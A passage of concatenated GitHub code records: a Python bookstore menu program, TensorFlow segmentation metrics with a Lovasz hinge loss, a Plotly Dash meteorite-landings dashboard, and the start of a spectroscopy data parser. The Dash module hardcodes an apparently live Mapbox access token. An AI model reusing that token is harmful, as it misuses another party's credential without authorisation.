x = bookStore.similarGraph.bfs2(index, index_location)\n for i in range(1, len(x)):\n print(bookStore.bookCatalog.get(x[i]))\n elif option == \"16\":\n pointer_1 = int(input(\"Enter the starting book index: \"))\n pointer_2 = int(input(\"Enter the reaching index: \"))\n result = bookStore.similarGraph.dfs2(pointer_1,pointer_2)\n print(\"the degree of seperation is: \", result)\n\n # elif option == \"12\":\n # choice = \"\"\n # prefix = input(\"enter a book title: \")\n # if prefix == \"\":\n # return None\n # while choice != \"0\":\n # print(\"Choose the following option to sort the books\")\n # print(\"\"\"\n # 1 Merge Sort\n # 2 Quick Sort\n # 0 Return to main menu\n #\n #\n # \"\"\")\n # choice = input()\n # if choice == \"1\" or choice == \"2\":\n # bookStore.SortableBooks(prefix, choice)\n\n\n\n\n\n ''' \n Add the menu options when needed\n '''\ndef the_DLList():\n dLList = DLList.DLList()\n option =\"\"\n while option != '0':\n print(\"\"\"\n 1 Add a element\n 2 Remove element\n 3 Check if Palindrome\n 4 Print out List\n 0 Return to Main menu\n \"\"\")\n option=input()\n if option==\"1\":\n append_value =input(\"Please enter a value: \")\n dLList.append(append_value)\n elif option==\"2\":\n remove_value = input(\"Please enter a value: \")\n if remove_value in dLList:\n dLList.remove(remove_value)\n else:\n print(\"Value is not in the list\")\n elif option==\"3\":\n print(dLList.isPalindrome())\n elif option==\"4\":\n print(dLList)\ndef traversal_function():\n y = BinaryTree.BinaryTree()\n x = 
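The four traversal branches under option 10 above differ only in the traversal call and the output file name, so they can be table-driven; a refactoring sketch (dump_traversal is a hypothetical helper, with tree standing in for bookStore.sortedTitle):

def dump_traversal(tree, choice):
    options = {
        '1': (lambda: tree.in_order(tree.r, []), 'books_in_order.txt'),
        '2': (lambda: tree.pre_order(tree.r, []), 'books_pre_order.txt'),
        '3': (lambda: tree.post_order(tree.r, []), 'books_post_order.txt'),
        '4': (lambda: tree.bf_traverse(), 'books_bftraversal.txt'),
    }
    traverse, fname = options[choice]
    with open(fname, 'a', encoding='UTF8') as f:
        for book in traverse():
            f.write(f"\n{book}")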
BinarySearchTree.BinarySearchTree()\n option = \"\"\n while option != '0':\n print(\"\"\"\n 1 Add Elements\n 2 Pre-Order\n 3 In-Order\n 4 Post-Order\n 5 Breath First\n 6 Height\n 0 Return to Main menu\n \"\"\")\n option=input()\n l = list()\n if option==\"1\":\n node = input(\"Enter Node: \")\n value = input(\"Introduce Node value: \")\n x.add(node,value)\n elif option==\"2\":\n x.pre_order(x.r, l)\n print(', '.join(map(str, l)))\n elif option==\"3\":\n x.in_order(x.r, l)\n print(', '.join(map(str, l)))\n elif option==\"4\":\n x.post_order(x.r, l)\n print(', '.join(map(str, l)))\n elif option==\"5\":\n print(x.bf_traverse())\n elif option==\"6\":\n print(x.height())\n\n\n\n\n#main: Create the main menu\ndef main() :\n option=\"\"\n while option != '0':\n print (\"\"\"\n 1 Calculator\n 2 Bookstore System\n 3 DLList\n 4 traversal and Height\n 0 Exit/Quit\n \"\"\")\n option=input() \n \n if option==\"1\":\n menu_calculator()\n elif option==\"2\":\n menu_bookstore_system()\n elif option==\"3\":\n the_DLList()\n elif option == \"4\":\n traversal_function()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"daxile6/BookStore-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21972403450","text":"import tensorflow as tf\r\nimport numpy as np\r\nfrom keras import backend as K\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef get_iou_vector(A, B):\r\n batch_size = A.shape[0]\r\n metric = []\r\n for batch in range(batch_size):\r\n t, p = A[batch]>0, B[batch]>0 \r\n intersection = np.logical_and(t, p)\r\n union = np.logical_or(t, p)\r\n iou = (np.sum(intersection > 0) + 1e-10 )/ (np.sum(union > 0) + 1e-10)\r\n thresholds = np.arange(0.5, 1, 0.05)\r\n s = []\r\n for thresh in thresholds:\r\n s.append(iou > thresh)\r\n metric.append(np.mean(s))\r\n\r\n return np.mean(metric)\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef tf_iou_metric(label, pred):\r\n return tf.py_func(get_iou_vector, [label, pred>0.5], tf.float64)\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef tf_iou_metric_2(label, pred):\r\n return tf.py_func(get_iou_vector, [label, pred>0.5], tf.float64)\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_grad(gt_sorted):\r\n \"\"\"\r\n Computes gradient of the Lovasz extension w.r.t sorted errors\r\n See Alg. 1 in paper\r\n \"\"\"\r\n gts = tf.reduce_sum(gt_sorted)\r\n intersection = gts - tf.cumsum(gt_sorted)\r\n union = gts + tf.cumsum(1. - gt_sorted)\r\n jaccard = 1. 
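The threshold loop in get_iou_vector above averages pass/fail indicators over the IoU cutoffs 0.5, 0.55, ..., 0.95; for a single sample the same score is one vectorized expression:

import numpy as np

def threshold_score(iou):
    # Fraction of the ten thresholds in [0.5, 0.95] that this IoU clears.
    return np.mean(iou > np.arange(0.5, 1, 0.05))

print(threshold_score(0.73))  # 0.5: clears 5 of the 10 thresholds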
- intersection / union\r\n jaccard = tf.concat((jaccard[0:1], jaccard[1:] - jaccard[:-1]), 0)\r\n return jaccard\r\n\r\n\r\n# --------------------------- BINARY LOSSES ---------------------------\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_hinge(logits, labels, per_image=True, ignore=None):\r\n \"\"\"\r\n Binary Lovasz hinge loss\r\n logits: [B, H, W] Variable, logits at each pixel (between -\\infty and +\\infty)\r\n labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)\r\n per_image: compute the loss per image instead of per batch\r\n ignore: void class id\r\n \"\"\"\r\n if per_image:\r\n def treat_image(log_lab):\r\n log, lab = log_lab\r\n log, lab = tf.expand_dims(log, 0), tf.expand_dims(lab, 0)\r\n log, lab = flatten_binary_scores(log, lab, ignore)\r\n return lovasz_hinge_flat(log, lab)\r\n losses = tf.map_fn(treat_image, (logits, labels), dtype=tf.float32)\r\n loss = tf.reduce_mean(losses)\r\n else:\r\n loss = lovasz_hinge_flat(*flatten_binary_scores(logits, labels, ignore))\r\n return loss\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_hinge_flat(logits, labels):\r\n \"\"\"\r\n Binary Lovasz hinge loss\r\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\r\n labels: [P] Tensor, binary ground truth labels (0 or 1)\r\n ignore: label to ignore\r\n \"\"\"\r\n\r\n def compute_loss():\r\n labelsf = tf.cast(labels, logits.dtype)\r\n signs = 2. * labelsf - 1.\r\n errors = 1. - logits * tf.stop_gradient(signs)\r\n errors_sorted, perm = tf.nn.top_k(errors, k=tf.shape(errors)[0], name=\"descending_sort\")\r\n gt_sorted = tf.gather(labelsf, perm)\r\n grad = lovasz_grad(gt_sorted)\r\n loss = tf.tensordot(tf.nn.relu(errors_sorted), tf.stop_gradient(grad), 1, name=\"loss_non_void\")\r\n return loss\r\n\r\n # deal with the void prediction case (only void pixels)\r\n loss = tf.cond(tf.equal(tf.shape(logits)[0], 0),\r\n lambda: tf.reduce_sum(logits) * 0.,\r\n compute_loss,\r\n strict=True,\r\n name=\"loss\"\r\n )\r\n return loss\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef flatten_binary_scores(scores, labels, ignore=None):\r\n \"\"\"\r\n Flattens predictions in the batch (binary case)\r\n Remove labels equal to 'ignore'\r\n \"\"\"\r\n scores = tf.reshape(scores, (-1,))\r\n labels = tf.reshape(labels, (-1,))\r\n if ignore is None:\r\n return scores, labels\r\n valid = tf.not_equal(labels, ignore)\r\n vscores = tf.boolean_mask(scores, valid, name='valid_scores')\r\n vlabels = tf.boolean_mask(labels, valid, name='valid_labels')\r\n return vscores, vlabels\r\n\r\n# code download from: https://github.com/bermanmaxim/LovaszSoftmax\r\ndef lovasz_loss(y_true, y_pred):\r\n y_true, y_pred = K.cast(K.squeeze(y_true, -1), 'int32'), K.cast(K.squeeze(y_pred, -1), 'float32')\r\n logits = y_pred #Jiaxin\r\n loss = lovasz_hinge(logits, y_true, per_image = True, ignore = None)\r\n return loss\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef iou_metric(y_true_in, y_pred_in, print_table=False):\r\n labels = y_true_in\r\n y_pred = y_pred_in\r\n\r\n\r\n true_objects = 2\r\n pred_objects = 2\r\n\r\n # if all zeros, original code generate wrong bins [-0.5 0 0.5],\r\n temp1 = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=([0,0.5,1], [0,0.5, 1]))\r\n\r\n intersection = temp1[0]\r\n\r\n # Compute areas (needed for finding the union between all objects)\r\n area_true = np.histogram(labels,bins=[0,0.5,1])[0]\r\n area_pred = np.histogram(y_pred, 
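lovasz_loss above feeds y_pred straight in as logits (note the inline comment), so a model compiled with it should end in a linear, not sigmoid, single-channel output. A hedged sketch with a minimal stand-in model:

from keras.models import Sequential
from keras.layers import Conv2D

# One 1x1 conv producing a linear 1-channel map; lovasz_loss consumes logits.
model = Sequential([Conv2D(1, 1, padding='same', input_shape=(128, 128, 1))])
model.compile(optimizer='adam', loss=lovasz_loss, metrics=[tf_iou_metric])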
bins=[0,0.5,1])[0]\r\n area_true = np.expand_dims(area_true, -1)\r\n area_pred = np.expand_dims(area_pred, 0)\r\n\r\n # Compute union\r\n union = area_true + area_pred - intersection\r\n \r\n # Exclude background from the analysis\r\n intersection = intersection[1:,1:]\r\n intersection[intersection == 0] = 1e-9\r\n \r\n union = union[1:,1:]\r\n union[union == 0] = 1e-9\r\n\r\n # Compute the intersection over union\r\n iou = intersection / union\r\n\r\n # Precision helper function\r\n def precision_at(threshold, iou):\r\n matches = iou > threshold\r\n true_positives = np.sum(matches, axis=1) == 1 # Correct objects\r\n false_positives = np.sum(matches, axis=0) == 0 # Missed objects\r\n false_negatives = np.sum(matches, axis=1) == 0 # Extra objects\r\n tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)\r\n return tp, fp, fn\r\n\r\n # Loop over IoU thresholds\r\n prec = []\r\n if print_table:\r\n print(\"Thresh\\tTP\\tFP\\tFN\\tPrec.\")\r\n for t in np.arange(0.5, 1.0, 0.05):\r\n tp, fp, fn = precision_at(t, iou)\r\n if (tp + fp + fn) > 0:\r\n p = tp / (tp + fp + fn)\r\n else:\r\n p = 0\r\n if print_table:\r\n print(\"{:1.3f}\\t{}\\t{}\\t{}\\t{:1.3f}\".format(t, tp, fp, fn, p))\r\n prec.append(p)\r\n \r\n if print_table:\r\n print(\"AP\\t-\\t-\\t-\\t{:1.3f}\".format(np.mean(prec)))\r\n return np.mean(prec)\r\n\r\n# src: https://www.kaggle.com/aglotero/another-iou-metric\r\ndef iou_metric_batch(y_true_in, y_pred_in):\r\n batch_size = y_true_in.shape[0]\r\n metric = []\r\n for batch in range(batch_size):\r\n value = iou_metric(y_true_in[batch], y_pred_in[batch])\r\n metric.append(value)\r\n return np.mean(metric)","repo_name":"interruping/ternausnet_tensorflow","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"27071992398","text":"from pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom dash.dependencies import Input, Output, State\nfrom dash._callback_context import callback_context as ctx\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom dash import dcc\n\n# MapBox access token\nmapbox_access_token = 'pk.eyJ1Ijoic2VyZW5haXZlcyIsImEiOiJjbDEzeDcxemUwNTN0M2Jxem9hbmVtb3RyIn0.K_CZ4pFHTGuZ2mOrCRC89Q'\n\n# all meteorite categories in the original dataset\ncategory_arr = ['stony', 'iron', 'stony iron', 'unclassified']\n\n# array used to keep track of selected meteorite categories\nvisible_arr = category_arr.copy()\n\n# dictionary used to map meteorite categories to map marker colors\ndiscrete_color_map = {'stony': '#3B8FA2',\n 'iron': '#CD4117',\n 'stony iron': '#F3CA4C',\n 'unclassified': '#888888'}\n\n# array used to map meteorite categories to bar and pie chart colors\ncolors = ['#3B8FA2', '#CD4117', '#F3CA4C', '#888888']\n\n# dictionary used to map year and mass graphs to colors corresponding to found/ fell categorisation\ntwo_color_palette = {\n 'Found': '#466930',\n 'Fell': '#48BF52'\n}\n\n# generic layout for dcc.Graph objects\nlayout = dict(\n plot_bgcolor='#FFFFFF',\n paper_bgcolor='#FFFFFF',\n xaxis=dict(color='black', showgrid=False),\n yaxis=dict(color='black', showgrid=False),\n title_font_family='Courier New',\n font_family='Courier New',\n title_font_color='black',\n font_color='black'\n)\n\n# Import data\n# ---------------------------------------------------------------------------------\nfp = 
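iou_metric_batch above is convenient for picking a binarisation threshold on held-out predictions; a sketch with hypothetical validation arrays:

import numpy as np

y_valid = np.random.randint(0, 2, (4, 8, 8))   # hypothetical ground-truth masks
preds_valid = np.random.rand(4, 8, 8)          # hypothetical predicted probabilities

thresholds = np.linspace(0.3, 0.7, 31)
scores = [iou_metric_batch(y_valid, (preds_valid > t).astype(int)) for t in thresholds]
print('best threshold:', thresholds[int(np.argmax(scores))])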
Path(__file__).parent.parent.parent.joinpath('meteorite_landings_cleaned.csv')\ndf = pd.read_csv(fp)\n\n# Define functions used in data filtering\n# ---------------------------------------------------------------------------------\n\n\ndef get_filtered_df(years_selected, discovery, mass_selected):\n \"\"\"filters global DataFrame df by year, discovery type (found/ fell) and mass\n Args:\n years_selected: tuple [start year, end year]\n discovery: array of strings, one of [\"Found\"], [\"Fell\"], [\"Found\", \"Fell\"], [\"Fell\", \"Found\"] or []\n mass_selected: tuple [minimum mass, maximum mass]\n Returns:\n filtered_df: global df filtered by parameter values\n \"\"\"\n # filter by year selection\n filtered_df = df[(df['year'] >= years_selected[0]) & (df['year'] <= years_selected[1])]\n\n # filter by discovery (found/ fell) selection\n filtered_df = filtered_df[filtered_df['fall'].isin(discovery)]\n\n # filter by mass selection\n filtered_df = filtered_df[\n (filtered_df['mass (g)'] >= mass_selected[0]) & (filtered_df['mass (g)'] <= mass_selected[1])]\n return filtered_df\n\n\ndef geo_filter(dff, selected_data):\n \"\"\"filters a DataFrame to match selection of points on geographical scatter map\n Args:\n dff: df with current filters applied\n selected_data: dictionary containing points on geographical scatter map selected via UI\n input, each point is a dictionary:\n {'points': {curveNumber, pointNumber, pointIndex, lon, lat, customdata, text}}\n Returns:\n dff: dff filtered to include only rows with id values corresponding\n to those specified by selected_data\n \"\"\"\n if selected_data is not None:\n row_ids = []\n for point in selected_data['points']:\n # customdata stores the id for each point in selected_data\n row_ids.append(point['customdata'])\n # match ids of selected_data to ids in meteorite dataset and filter accordingly\n dff = dff[dff['id'].isin(row_ids)]\n return dff\n\n\ndef get_by_category_count(filtered_df):\n \"\"\"calculates count of each unique value in 'category' column of a DataFrame\n Args:\n filtered_df: df with current filters applied\n Returns:\n df_count: DataFrame with columns 'category' and 'count'\n \"\"\"\n df_count = pd.DataFrame(filtered_df['category'].value_counts().reset_index().values, columns=['category', 'count'])\n df_count = df_count.sort_index(axis=0, ascending=True)\n return df_count\n\n\ndef get_by_year_count(filtered_df):\n \"\"\"groups a DataFrame by 'year' and 'fall' columns and calculates count of each group\n Args:\n filtered_df: df with current filters applied\n Returns:\n df_count: DataFrame with columns 'year', 'fall' and 'count'\n \"\"\"\n df_count = filtered_df.groupby(['year', 'fall'])['name'].count().unstack(fill_value=0).stack().reset_index()\n df_count.columns = ['year', 'fall', 'count']\n df_count.sort_values(by='year', inplace=True)\n return df_count\n\n\n# Define functions used to create plotly graph figures in visualise-by column\n# --------------------------------------------------------------------------------\n\n\n# category graph (bar graph or pie chart depending on argument category_graph_type)\n# ---------------------------------------------------------------------------------\ndef get_category_graph(filtered_df, category_graph_type):\n # get meteorite count by category\n df_category_count = get_by_category_count(filtered_df)\n\n # bar graph\n if category_graph_type == 'Bar':\n fig = px.bar(\n data_frame=df_category_count,\n x='category',\n y='count',\n orientation='v',\n color='category',\n 
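The unstack(fill_value=0).stack() round-trip in get_by_year_count exists purely to materialise zero counts for (year, fall) combinations that never occur, so the line chart does not skip years. A toy DataFrame makes the effect visible:

import pandas as pd

toy = pd.DataFrame({'year': [1999, 1999, 2000],
                    'fall': ['Found', 'Fell', 'Found'],
                    'name': ['a', 'b', 'c']})
counts = toy.groupby(['year', 'fall'])['name'].count().unstack(fill_value=0).stack().reset_index()
counts.columns = ['year', 'fall', 'count']
print(counts)  # includes a (2000, 'Fell') row with count 0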
color_discrete_sequence=colors,\n )\n\n fig.update_layout(\n xaxis_title='Meteorite Category',\n yaxis_title='Number of Meteorite Landings')\n\n # pie chart\n elif category_graph_type == 'Pie':\n fig = px.pie(\n data_frame=df_category_count,\n names='category',\n values='count',\n color='category',\n color_discrete_sequence=colors\n )\n\n fig.update_traces(\n textinfo='percent+label',\n marker_line=dict(color='black', width=1)\n )\n\n # update fig with generic graph layout and shared legend title\n fig.update_layout(\n layout,\n legend_title='Category'\n )\n return fig\n\n\n# year graph (line graph with separate traces corresponding to found/ fell categorisation)\n# ----------------------------------------------------------------------------------------\ndef get_year_graph(filtered_df, discovery):\n # get meteorite count by year\n df_year_count = get_by_year_count(filtered_df)\n\n trace = []\n\n # if found and fell are both selected\n if 'Found' in discovery and 'Fell' in discovery:\n # add a trace with data corresponding to ALL meteorite landings\n trace.append(\n dict(\n name='All',\n type='scatter',\n mode='lines',\n x=df_year_count['year'],\n y=df_year_count['count'],\n visible='legendonly'\n )\n )\n\n # add separate traces corresponding to each selected mode of discovery (found and/or fell)\n for i in discovery:\n trace.append(\n dict(\n name=i,\n type='scatter',\n mode='lines',\n x=df_year_count[df_year_count['fall'] == i]['year'],\n y=df_year_count[df_year_count['fall'] == i]['count'],\n marker=dict(\n color=two_color_palette[i]\n )\n )\n )\n\n # initialise figure with generic layout\n fig = go.Figure(data=trace, layout=layout)\n # update layout with features specific to year graph\n fig.update_layout(\n hovermode='x unified',\n yaxis_title='Number of Meteorite Landings',\n xaxis_title='Year',\n )\n fig.update_yaxes(rangemode='tozero')\n\n return fig\n\n\n# mass graph (histogram or box & whisker plot depending on argument mass_graph_type)\n# ----------------------------------------------------------------------------------------\ndef get_mass_graph(filtered_df, mass_graph_type, discovery, log_scale):\n # set scale and x-axis title according to parameter log_scale\n if log_scale == 'on':\n filtered_df['log mass (g)'] = np.log(filtered_df['mass (g)'])\n x_col = 'log mass (g)'\n xaxis_title = 'log mass (g)'\n else:\n x_col = 'mass (g)'\n xaxis_title = 'Mass (g)'\n\n # initialise figure with generic layout\n fig = go.Figure(layout=layout)\n\n # histogram\n if mass_graph_type == 'Histogram':\n # if found and fell are both selected\n if 'Found' in discovery and 'Fell' in discovery:\n fig.add_trace(\n go.Histogram(\n name='All',\n x=filtered_df[x_col],\n visible='legendonly'\n ),\n )\n\n # add separate traces corresponding to each selected mode of discovery (found and/or fell)\n for i in discovery:\n fig.add_trace(\n go.Histogram(\n name=i,\n x=filtered_df[filtered_df['fall'] == i][x_col],\n marker=dict(\n color=two_color_palette[i]\n )\n ),\n )\n\n # update layout with features specific to histogram\n fig.update_layout(\n layout,\n barmode='overlay',\n hovermode='x unified',\n xaxis_title=xaxis_title,\n yaxis_title='Number of Meteorite Landings'\n )\n\n fig.update_traces(opacity=0.75)\n\n # box & whisker plot\n elif mass_graph_type == 'Box':\n # if found and fell are both selected\n if 'Found' in discovery and 'Fell' in discovery:\n # add a trace with data corresponding to ALL meteorite landings\n fig.add_trace(\n go.Box(\n name='All',\n x=filtered_df[x_col],\n orientation='h',\n 
visible='legendonly'\n ),\n )\n\n # add separate traces corresponding to each selected mode of discovery (found and/or fell)\n for i in discovery:\n fig.add_trace(\n go.Box(\n name=i,\n x=filtered_df[filtered_df['fall'] == i][x_col],\n orientation='h',\n marker=dict(\n color=two_color_palette[i]\n )\n ),\n )\n\n # update layout with features specific to box & whisker plot\n fig.update_layout(\n xaxis_title=xaxis_title)\n\n return fig\n\n\ndef register_callbacks(dashapp):\n # geographical scatter map\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n [Output('map-plot', 'figure'),\n Output('map-plot', 'selectedData')],\n [Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('color-coordinate', 'value'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value'),\n Input('size-coordinate', 'value'),\n Input('category-graph', 'restyleData'),\n Input('map-plot', 'selectedData'),\n State('map-plot', 'figure')]\n )\n def update_map(years_selected, discovery, color_coord, n_clicks, mass_selected, size, cat_selected, selected_data,\n current_fig):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n text = filtered_df.name\n trace = []\n selectedData = None\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n # keep the same selection of points as before\n selectedData = selected_data\n\n # share data stored in visible_arr between callbacks\n global visible_arr\n\n # if the callback was triggered by trace selection/ deselection on category graph\n if ctx.triggered[0]['prop_id'].split('.')[0] == 'category-graph':\n\n # then filter data visible on map according to currently selected categories on category graph\n if cat_selected is not None:\n\n # if the callback was triggered by trace deselection\n if cat_selected[0]['visible'][0] == 'legendonly':\n # match index to category_arr and remove deselected category from visible_arr\n visible_arr.remove(category_arr[cat_selected[1][0]])\n\n # if the callback was triggered by selection of a new trace\n elif cat_selected[0]['visible'][0]:\n # match index to category_arr and add newly selected category to visible_arr\n visible_arr.append(category_arr[cat_selected[1][0]])\n\n # if callback was not triggered by trace selection/ deselection\n # then it would instead be triggered by switching between bar and pie charts\n else:\n # except for first call, when no fig has been initialised yet\n if current_fig is not None:\n # map display remains unchanged\n return [current_fig, selected_data]\n\n # if user has selected option to coordinate map markers to category\n if color_coord == 'on':\n # loop through all possible categories in original (unfiltered) dataset\n for i in category_arr:\n # if category is currently selected via category graph\n if i in visible_arr:\n # add corresponding data to map trace\n trace.append(\n dict(\n name=i,\n type='scattermapbox',\n # each trace handles only the data corresponding to current category\n lat=filtered_df[filtered_df['category'] == i]['reclat'],\n lon=filtered_df[filtered_df['category'] == i]['reclong'],\n text=text,\n hoverinfo='text',\n mode='markers',\n marker=dict(\n # match category to corresponding color\n color=discrete_color_map[i],\n # set marker size proportional to mass\n size=2 * 
(np.log(filtered_df[filtered_df['category'] == i]['mass (g)'])),\n opacity=0.6),\n # store row id of each data point\n customdata=filtered_df[filtered_df['category'] == i]['id']\n )\n )\n else:\n # display all data in filtered df with a constant color\n trace.append(\n dict(\n type='scattermapbox',\n lat=filtered_df.reclat,\n lon=filtered_df.reclong,\n hovertemplate=None,\n text=text,\n hoverinfo='text',\n mode='markers',\n marker=dict(\n color='#F3959A',\n # set marker size proportional to mass\n size=2 * (np.log(filtered_df['mass (g)'])),\n opacity=0.6),\n # store row id of each data point\n customdata=filtered_df.id\n )\n )\n\n # set map-specific layout\n map_layout = dict(\n hovermode='closest',\n margin=dict(r=0, l=0, t=0, b=0),\n color=filtered_df.category,\n showlegend=False,\n mapbox=dict(\n accesstoken=mapbox_access_token,\n bearing=0,\n center=dict(\n lat=0,\n lon=0,\n ),\n zoom=0.7,\n style='carto-positron',\n ),\n )\n fig = dict(data=trace, layout=map_layout)\n\n # if user has not selected to coordinate size to mass\n if size == 'off':\n # set constant marker size\n for i in fig['data']:\n i['marker']['size'] = 9\n\n return [fig, selectedData]\n\n # interactive table\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('interactive-table', 'data'),\n [Input('map-plot', 'selectedData'),\n Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value')]\n )\n def update_table(selected_data, years_selected, discovery, n_clicks, mass_selected):\n # if callback was triggered by refresh button clear table\n if ctx.triggered[0]['prop_id'].split('.')[0] == 'refresh-button':\n return None\n\n # if nothing is selected on the map table is empty\n elif selected_data is None:\n return None\n\n # else populate table according to the selected data\n else:\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n dff = geo_filter(filtered_df, selected_data)\n dff = dff.filter(items=['name', 'fall', 'category', 'year', 'mass (g)'])\n return dff.to_dict('records')\n\n # category tab\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('category-tab-content', 'children'),\n [Input('year-slider', 'value'),\n Input('category-graph-type', 'value'),\n Input('found-fell-selection', 'value'),\n Input('map-plot', 'selectedData'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value')]\n )\n def update_category_tab(years_selected, category_graph_type, discovery, selected_data, n_clicks, mass_selected):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection via UI of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n\n fig = get_category_graph(filtered_df, category_graph_type)\n content = dcc.Graph(id='category-graph', figure=fig)\n return [content]\n\n # year tab\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('year-tab-content', 'children'),\n [Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('map-plot', 'selectedData'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value')]\n )\n def update_year_tab(years_selected, discovery, selected_data, 
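The callbacks above and below all recover the triggering component with ctx.triggered[0]['prop_id'].split('.')[0]; naming that idiom would keep the branches readable (triggered_id is a hypothetical helper, not part of the original module):

def triggered_id(ctx):
    # Dash encodes the trigger as '<component-id>.<property>'.
    if not ctx.triggered:
        return None
    return ctx.triggered[0]['prop_id'].split('.')[0]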
n_clicks, mass_selected):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n\n fig = get_year_graph(filtered_df, discovery)\n content = dcc.Graph(id='year-graph', figure=fig)\n return [content]\n\n # mass tab\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('mass-tab-content', 'children'),\n [Input('year-slider', 'value'),\n Input('found-fell-selection', 'value'),\n Input('mass-graph-type', 'value'),\n Input('map-plot', 'selectedData'),\n Input('refresh-button', 'n_clicks'),\n Input('mass-slider', 'value'),\n Input('log-scale', 'value')]\n )\n def update_mass_tab(years_selected, discovery, mass_graph_type, selected_data, n_clicks, mass_selected, log_scale):\n filtered_df = get_filtered_df(years_selected, discovery, mass_selected)\n\n # if anything other than input from the <> button triggered the callback\n if ctx.triggered[0]['prop_id'].split('.')[0] != 'refresh-button':\n # filter by current selection of points on map\n filtered_df = geo_filter(filtered_df, selected_data)\n\n fig = get_mass_graph(filtered_df, mass_graph_type, discovery, log_scale)\n content = dcc.Graph(id='mass-graph', figure=fig)\n return content\n\n # category tab control box\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('category-control-box', 'style'),\n [Input('visualise-by-tabs', 'active_tab')]\n )\n def display_category_control_box(active_tab):\n # display category tab control box if category tab is currently active\n if active_tab == 'category-tab':\n style = {'display': 'block'}\n # else keep hidden\n else:\n style = {'display': 'none'}\n return style\n\n # mass tab control box\n # ------------------------------------------------------------------------------\n @dashapp.callback(\n Output('mass-control-box', 'style'),\n [Input('visualise-by-tabs', 'active_tab')]\n )\n def display_mass_control_box(active_tab):\n # display mass tab control box if mass tab is currently active\n if active_tab == 'mass-tab':\n style = {'display': 'block'}\n # else keep hidden\n else:\n style = {'display': 'none'}\n return style\n","repo_name":"serenaives/visualising_meteorite_landings","sub_path":"part_2/dashboard/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":21884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70491476402","text":"from __future__ import print_function\n\nimport matplotlib.pyplot as plt\n\nwith open('downloaded_data/oh_rot.dat') as inputfile:\n lines = inputfile.readlines()\n\nfreqs_hitran = []\necoeffs_hitran = []\njlower_hitran = []\njhigher_hitran = []\n\nfor line in lines:\n if len(line) > 1:\n\n data = line.split()\n \n if 'v=0' not in data[3] and 'v=0' not in data[4]:\n continue\n\n lj = float(data[3].split('J=')[1].split(';')[0])\n hj = float(data[4].split('J=')[1].split(';')[0])\n\n if lj >= hj or lj > 20 or hj > 20:\n continue\n\n freqs_hitran.append(float(data[1]))\n ecoeffs_hitran.append(float(data[2]))\n \n jlower_hitran.append(lj)\n jhigher_hitran.append(hj)\n\nfor f, lj, hj, a in zip(freqs_hitran, jlower_hitran, jhigher_hitran, ecoeffs_hitran):\n print('freq: {0}; lower j: {1}; higher j: {2}; einst: 
